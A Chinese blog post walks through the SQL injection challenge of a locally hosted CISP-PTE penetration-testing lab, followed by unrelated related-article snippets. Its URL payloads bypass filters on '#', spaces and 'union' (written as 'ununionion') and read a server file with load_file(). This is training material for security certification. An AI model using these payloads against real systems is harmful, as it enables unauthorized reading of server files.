首页 > 数据库 >CISP-PTE靶场通关思路分享-SQL注入篇

CISP-PTE靶场通关思路分享-SQL注入篇

时间:2023-03-31 18:22:28浏览次数:44  
标签:23 vulnerabilities PTE fu1 CISP 192.168 SQL 81

pte靶场中包含5道web题

SQL注入

首先打开本地搭建的网址,发现我们需要利用SQL注入对/tmp/360/key文件进行读取,读取该文件需要使用load_file()函数,该函数是MySQL中常见内置函数。

 

 

 

进入答题后,发现由当前执行的SQL语句,按照当前执行的SQL语句对SQL语法进行闭合

 

1 http://192.168.110.100:81/vulnerabilities/fu1.php?id=1%27)#        #闭合,输入#,发现#已被过滤,则用%23进行替换,发现空格也被过滤,空格的替换可以使用%0a或者/**/或者()或者+等进行替换
2 http://192.168.110.100:81/vulnerabilities/fu1.php?id=1%27)%23    #成功闭合SQL语句

我们是用%23替换#;使用/**/替换空格,然后使用order by语法对行号进行判断,在使用union select判断显示位

首先判断行号,发现是四行

1 http://192.168.110.100:81/vulnerabilities/fu1.php?id=1')/**/order/**/by/**/5%23
2 http://192.168.110.100:81/vulnerabilities/fu1.php?id=1')/**/order/**/by/**/4%23

 使用

1 http://192.168.110.100:81/vulnerabilities/fu1.php?id=-1')/**/union/**/select/**/1,2,3,4%23 发现union被过滤

 

 

 当过滤掉关键函数时,双写关键函数进行绕过是常见的方法之一,我们尝试双写union绕过,发现成功绕过

1 http://192.168.110.100:81/vulnerabilities/fu1.php?id=-1%27)/**/ununionion/**/select/**/1,2,3,4%23

 

 

 接下来需要在可以显示的位置使用load_file()函数将敏感信息显示出来

1 http://192.168.110.100:81/vulnerabilities/fu1.php?id=-1%27)/**/ununionion/**/select/**/1,2,3,load_file("/tmp/360/key")%23

显示成功:

 

标签:23,vulnerabilities,PTE,fu1,CISP,192.168,SQL,81
From: https://www.cnblogs.com/newcomer/p/17277010.html

相关文章

  • 使用EFCore的Code First和MySql数据库迁移(转载 )
    下辈子还当程序员 博客园首页新随笔联系订阅管理随笔-4  文章-0  评论-9  阅读- 44432使用EFCore的CodeFirst和MySql数据库迁移 1.感慨一下    随着.netcore的持续更新和升级,至少对于从事.net开发的人员和即将踏入这个领域......
  • 使用SqlBulkCopy sqlserver 批量插入数据(C#)
    先说实现原理:将需要插入数据库的集合里面的数据存在datatable里面,列名需相同,然后调用SqlBulkCopy方法。1.新建datatable,并赋值DataTabledataTable=newDataTable();dataTable.Columns.Add("NAME1");dataTable.Columns.Add("NAME2");dataTable.Columns.Add("NAME3");data......
  • mysql——null值和空值
    参考:https://blog.csdn.net/xp178171640/article/details/103065271?spm=1001.2101.3001.6650.2&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-2-103065271-blog-107128984.235%5Ev27%5Epc_relevant_3mothn_strategy_and_data_recovery......
  • mysql全文索引
    建立索引语句1.需要字段字符集一致utf8mb4根据自己字段定义ALTERTABLEuserADDFULLTEXT(name,email,phone,external_id)WITHPARSERngramCHARSETutf8mb4;索引占用空间user表大约80M,创建的全文索引占用空间约100M(不含表大小)使用全文索引两种查法:select*from......
  • NoSQL - 非关系型数据库
    一、定义主要针对键值、文档、图形类型数据存储;天生支持分布式,数据冗余和数据分片等特性,旨在提供可扩展的高可用高性能数据存储解决方案;代表有:HBase,Cassandra,MongoDB,Redis   二、SQL与NoSQL区别      三、分类1.键值数据库其......
  • MS SQL Server SQL刷题记录
    MSSQLServerSQL方言和mysqlsql略有不同目录保留4位小数求曼哈顿距离和欧几里得距离求中位数表联结表联结,我真心建议给你的列命名的时候不要瞎命名保留4位小数SELECTCAST(ROUND(SUM(LAT_N),4)ASDECIMAL(10,4))FROMSTATIONWHERELAT_N>38.7880ANDLAT_N<137.23......
  • 卸载SQL Server 2012图文教程
    卸载步骤1、键盘上同时按”Win+R”这两个键,或如下图所示右击开始图标选择“运行”2.输入”services.msc”命令打开服务3.找到所有跟SqlServer有关的服务,并且停止这些服务。(一定要先停止服务再卸载,否则后续卸载文件过程中会失败)  4.进入控制面板,点击“程序卸载”5.在......
  • SQL - 语法
    一、概念1.语法语法结构:要点:语句不区分大小写;多条语句以“;”分割;处理SQL语句时,所有空格都被忽略2.分类数据操纵语言DML数据定义语言DDL事务控制语言TCL数据控制语言DCL 二、数据操纵语言DML用于数据库操作,对数据库其中的对象和数据运......
  • 12 SQL语句的补充----复制表数据
    复制数据表1、复制数据1.1创建一个字段和源表不同的虚拟表 createtemporarytablet_yy( idint(16), namevarchar(25), sexvarchar(25) );源表与目标字段不一致,复制数据需要指定字段insertintot_yy(id,name,sex)selectid,sname,sexfromt_student;1.2创建一......
  • java.sql.SQLException: sql injection violation, multi-statement not allow?已解决
    今天在使用mybatis-oracle时有需求需要同时更新多个字段,在跑完接口后我发现有如下异常sqlinjectionviolation,multi-statementnotallow原因是没有配置allowMultiQueries=truespringboot项目直接在配置文件写上如下配置即可还有用config类来解决的在配置类中添加如下两......